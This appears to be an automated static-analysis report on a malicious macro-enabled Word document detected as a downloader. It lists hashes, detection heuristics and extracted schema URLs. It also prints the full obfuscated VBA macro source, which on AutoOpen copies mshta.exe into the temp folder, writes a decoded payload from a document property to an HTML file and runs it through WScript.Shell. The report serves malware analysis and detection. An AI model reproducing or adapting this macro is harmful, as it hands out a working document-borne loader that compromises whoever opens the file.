Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7a633a8c10ec64fd…

MALICIOUS

Office (OOXML)

Size: 100.6 KB
Created: 2020-11-18 21:26:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-11-23
MD5: 5f596219a4c1b50d5de18e272b25a78f
SHA-1: 4a4e8b245a604afaa0bc265a0195b3869ae25467
SHA-256: 7a633a8c10ec64fd3024d8735dabf0f22c9b1ee165fb0876cfc265c0f4d9bd2e
Risk score: 138

Heuristics 6

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Call CreateObject("ws" + aLe1a + "ell").run(aoqck)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    aiE4r = Environ(anzx27)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/ — In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/ — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10806 bytes
SHA-256: d0a93ac097c871d905bc538e35dedd1f3cbb91adda1fc91f0a3b39c16c749146
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "agX5B"
Sub AutoOpen()
' Hog wanna records tambourine
auSZrg
End Sub

Attribute VB_Name = "ayJfoq"
Public Const aVLl2g As String = ""
Public Const ameiM9 As Integer = 358 - 345
Public Const asSkn As String = "1ridn1iw1"
Public Const a8VFg As String = "231met1sys1"
Public Const aE9gD As String = "p1m1e1t"
Public Const aLe1a As String = "cript.sh"
Function aTVuxK()
End Function
Sub aTgBN(aGf8l)
' Gallon
' Hz
' Grants uncritical irrigation oyster chronic additions
' Comparison fireplace nowhere impact
' Specifying halloween preston lathe wings
' Likewise layer geometry nominated
' Buttoned hey educate
' Queen damaged olive
' Electrode trifled allocation exhibitions
' Aura formations elegant trade hoes
' Environs hiking annual
' X roll
' Transgress information
' Federation downloads apostrophe
' Option insincerity
' Makes dominoes unlike lopez holdings
' Carmine avoidance gbp about shipwreck
' Rancorous self-reliant gripping glorification tunis
' Sw
' Politics mohawk unprotected inventory
' Eva answer minimize cashiers
' Specialized blister fight dalliance piquant aerial
' In- blowing illinois
' Enumeration desperate university hotmail specialist bivouac
End Sub
Function aPKuj(aPj7gx)
' Bee chewing wards truly turns
' Tatiana water
' Brooch cubic piss
' Indisposition delhi mounts
' Collecting degree sample
' Underlie blend personal tenement
' Grant childrens augmentation cum
' Denote trevor
' Cups theoretical imprudent itinerant pedagogue
' Dour commodities fillet
' Complementary
' Nn functioning
' Unconcern nirvana fertilizer tagged
' Valparaiso burst bathroom veined
' Salvador bread jc muslims
' Heavily physics idol
' Disorder
' Thirty restriction
' Thrive algebra regularly guerdon
' Heart-rending janus hugo ventilation
' Emanuel org pointed
' Cheerless nextel
aPKuj = ActiveDocument.BuiltInDocumentProperties(aPj7gx)
End Function
Public Sub a0h3e()
aAc7v6
End Sub
Public Sub ahlOzv()
a5m7pT
End Sub

Attribute VB_Name = "ajiyG"
Public Function aACQT(amaAD, ac2o7)
' Jeweller alleviate usable
' Physiology somber
' Discrimination tartar
' Mentor virtual passport document
' Euphrates across barricade its tottering petted
' Tamil
' Stentorian tum hydrogen
' Drought unconsciousness laundress api
' Cypress motorcycle plug
' Exp ss theocracy dick
' Inert
' Lancet buff increased bruising honda sticky
' Lenient temporarily zest gander outlawed
' Silk indubitable
' Matching
FileNumber = FreeFile
Open amaAD For Output As #FileNumber
' Quince beginning
Print #FileNumber, ac2o7
' Component footstep
' Carnivorous
' Beth hub align assembling manipulation surpass ledger
' Someone godhead
' Thrifty farms governor butchers ul
' Hoof export
' Exit
' Scraped
' Persuasive thinker technical
' Blogging expenses jamie tribute sardinia
' Be foal remiss refraction
Close #FileNumber
End Function
Sub azje8(aUfX0, a3d4Pg)
' Drivers basement blithe
' Luscious forth tricks
' Debauchery
' Transcending visitation lodger
' Guests
' Cereal
' Dev loafer mounts goto
' Sickening outwardly episcopal articulated
' Villages
' Flight shaw godlike insured although frankfurt
' Senegal hoover nothingness
' Threshold korea fabrication
' Inaudible thorough hemlock
' Marche diameter peninsula real
' Physiology wean
' Noose rift fridge content
' Prepaid
' Medicines terra joseph officiate
' Mace zero scrip baking
' Assign endif comport consent box ailing
' Varieties unity
' Gymnasium
' Diameter tariff
FileCopy aUfX0, a3d4Pg
End Sub
Function aExWK(aTBDL7)
aExWK = aTBDL7
End Function
Function ahPpLr(aTBDL7) As String
Dim axw8y As Long
Dim aQe30 As Integer
Dim aftnQ As Integer
For axw8y = 1 To Len(aTBDL7)
aftnQ = 0
' Yearling pf surrounding
acHro = Mid(aTBDL7, axw8y, 1)
aQe30 = Asc(acHro)
' Unutterable upstart appliance eu specter recipes
If (aQe30 > aqXnbZ(17226 - 17225) And aQe30 < aqXnbZ(5350 / 2675)) Or (aQe30 > aqXnbZ(2735 - 2732) And aQe30 < aqXnbZ(14080 / 3520)) Then
aftnQ = ameiM9
aQe30 = a7h4w3(aQe30, aftnQ)
If aQe30 < aqXnbZ(5) And aQe30 > 83 Then
aQe30 = azQL2(aQe30)
ElseIf aQe30 < 166 - 101 Then
aQe30 = azQL2(aQe30)
End If
End If
aPjsu = awovqB(aQe30)
Mid$(aTBDL7, axw8y, 1) = aExWK(aPjsu)
Next axw8y
ahPpLr = aTBDL7
End Function

Attribute VB_Name = "aOWFXu"
Function aBgY3(awVny)
aTDAS = awVny
aYt3ua = Len(aTDAS)
For aeKFSv = 0 To aYt3ua - 1
' Clipped malayan sufficiently
' Sw indigenous
' Screening era use toolbar
' Sell scary disrespect
' Treasurer brabant daddy
' Announced acdbentity blocking
' Moisten gba variety assailant
' Attributes bomb
' Warily ons buzz associates
' Avon premise sluggish trading joust
' Crew personnel
a371g = a371g & Mid(aTDAS, (aYt3ua - aeKFSv), 1)
Next aeKFSv
' Felt nomadic residuum bracket revise ile remark
' Present nation evolutionary irrigation idol immediate
' Narcissist
' Empirical kurt
' Relating earldom coercion adduced holds alabaster reggie
' Atomic photograph
' Elite venice forty-three importation assassin
' Operate korean
' Congress xl tolerance dunno
' Vietnamese miry exp tab
' Niche eastwards oily impervious
aBgY3 = a371g
End Function
Public Function a3sPQW(afH0ng)
a3sPQW = Replace(afH0ng, aVLl2g, "")
End Function
Sub auSZrg()
' Nasty
' Target draws tahiti
' Qatar sequence damaged
' Ski fallow
' Moderator students taboo embryo
' Responded hiv placement chile
' Iambic surround together contingent
' Mangrove anchorage exact
' Salvador blatant hitachi tee mica
' Federation lucky cheaper odorous
' Markings
a0h3e
ahlOzv
' Webmaster login gauzy
' Radiate domino
' Surrey circumvent recluse
' Flinty last implement advisory
' Fiji franchise myself cognac
' Solicitous grub esprit vacation shot accessible
' Spending
' Shipment jacket rip illimitable
' Aggression
' Cheshire steamed himself beck
' Detail spas
' Polar turban
' Ment medium
' Likelihood devil
' Resides father entice
' Concave sand
' Postmaster trend bawl higher
' Tee pod sends ahead
' Pigeon af sepulture marks pentium
' Jacobus nearly edition ladle apps blight
' Lapland lexus inspector
' Derived def
Call CreateObject("ws" + aLe1a + "ell").run(aoqck)
End Sub

Attribute VB_Name = "a6x97o"
Function aiE4r(anzx27)
aiE4r = Environ(anzx27)
End Function
Function abF2zX()
' Threshing matrix colours illinois
' Loot afghanistan
' Primacy expostulation contract
' Official probe
' Bragging orally
' Volga lorenz cameras
' Agrarian tutelage approximately roster
' Suppose ieee creates threatened
' Yang stress womankind enumeration
' Lauderdale decrease fall hilltop
' September munificent services
With Application
abF2zX = .PathSeparator
End With
End Function
Function auDvEl(al2Cj)
' Laudable ravages disorder
aUhzX = VBA.Split(aBgY3("lmth.ni|moc.ni|exe.athsm"), "|")
' Min max diametrically effeminacy heliotrope
' Flimsy neutralize duties
' Smuggle adamant cell kidney
' Image broadband splinter
' Simple heater woods vat
' Academies yew adjustable unsociable
' Vids tripoli funk efficacious
' Task internship rip sat.
' Squalor crater crabs ps.
' Symptom screensavers grease kinda
' Isbn mexican how mainstream
' Ebooks
' Evergreen phillip compulsory carrying
' Profits shareware
' Paperback
' Chat funny vans trollope
' Grave servers ur bentley
' Baal analytical pa solutions papers
' Illegitimate snaps yule
' Donor
' Prism sq brilliance
' Peripherals rectangular mattress
' Panorama
' Undertakings lebanon adult disturbed
' Shortcuts officiate associates castaway pledge
' Allowance stew actual majority
' Luminary swedish diver engines efficacy ir
' Loveless guidelines proven thesis
' Brooded io
' Crm truth wma idaho weighted
' Commendable loathe rh cho
' Amphitheatre pure guide widen
Select Case al2Cj
Case 0:
' Vowel gnu
' Unauthorized informal
' Infant grandpa
' Balustrade ended jonathan wag
' Exterior xl limits alton
' Furze representation say cove brunette
' Confederation richards participle articles debt
' Midnight pick
' Administrators clear
' Deign froward vt flippant
auDvEl = aiE4r(Replace(aBgY3(asSkn), "1", "")) & abF2zX & Replace(aBgY3(a8VFg), "1", "") & abF2zX & aUhzX(0)
Case 1:
' Ottawa different ec notices pewter
' Wu comics
' Deposition etching santa ownership dt
' Liable against prune trident there
' Sieve affiliation thereafter
' Challenged hypothesis conferences perceived astronomer
' Xanax miss
' Permit cartel loans
' Nowhere contemporaneous admit can nj
' Algebra damped crumble
' Struggle wy roommate
auDvEl = aiE4r(Replace(aBgY3(aE9gD), "1", "")) & abF2zX & aUhzX(1)
' Unavailable frequency
Case 2:
auDvEl = aiE4r(Replace(aBgY3(aE9gD), "1", "")) & abF2zX & aUhzX(2)
End Select
End Function
Sub a5m7pT()
arXdT = agQIB3(auDvEl(2))
aACQT arXdT, ahPpLr(aPKuj("category"))
End Sub

Attribute VB_Name = "aUIpaz"
Function aGiC7D(am1sS)
' Das retention
' Bowler outwardly michel newark
' Writing window receiving serves describing
' Travesti motels zoo
' Quarto adjustable
' Adrian scanner third
' Infant mailed bel
' Sake -s yugoslavia
' Rotary eliminate analyst slav
' Valve corpulent floral meager
aGiC7D = (a3sPQW(am1sS))
End Function
Function afNZuL(aNgTB4)
' Syphilis uses
afNZuL = (a3sPQW(aNgTB4))
End Function
Function agQIB3(awG0c)
agQIB3 = (a3sPQW(awG0c))
End Function
Function aoqck()
aR9zg = afNZuL(auDvEl(1))
aMiY4 = agQIB3(auDvEl(2))
aoqck = aR9zg & " " & aMiY4
End Function

Attribute VB_Name = "aEf1v"
Sub aAc7v6()
akUrX = aGiC7D(auDvEl(0))
ad8Mp = afNZuL(auDvEl(1))
azje8 akUrX, ad8Mp
End Sub
Function azQL2(aMZ0v)
azQL2 = aMZ0v + 467 - 441
End Function
Function aqXnbZ(aMQ9V1)
If aMQ9V1 = 0 Then
aqXnbZ = 12941 / 12941
ElseIf aMQ9V1 = 1 Then
aqXnbZ = -288 + 352
ElseIf aMQ9V1 = 2 Then
aqXnbZ = 410 - 319
ElseIf aMQ9V1 = 3 Then
aqXnbZ = 24000 / 250
ElseIf aMQ9V1 = 4 Then
aqXnbZ = 200 - 77
ElseIf aMQ9V1 = 5 Then
aqXnbZ = 169 - 72
Else
aqXnbZ = 1047 - 23
End If
End Function
Function a7h4w3(aMZ0v, a3WJh)
a7h4w3 = aMZ0v - a3WJh
End Function
Function awovqB(aMZ0v)
awovqB = VBA.ChrW(aMZ0v)
' Slander sweden analytic simpson
' Butler missions sex rf marbles
' Polo neural
' Noise compromise swap mailing
' Mangy infidel
' Gp misc loath
' Salesman petroleum appraised martha
' Embodiment schools handjob
' Eth fir mailed shack spiced accurately bewildering
' Linux pad abler
' Mixer beautifully
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 47104 bytes
SHA-256: 91e0e97e91e889495382b0d7faab3c7bc2251d06f5b4b707e9b2dfb7cb38de41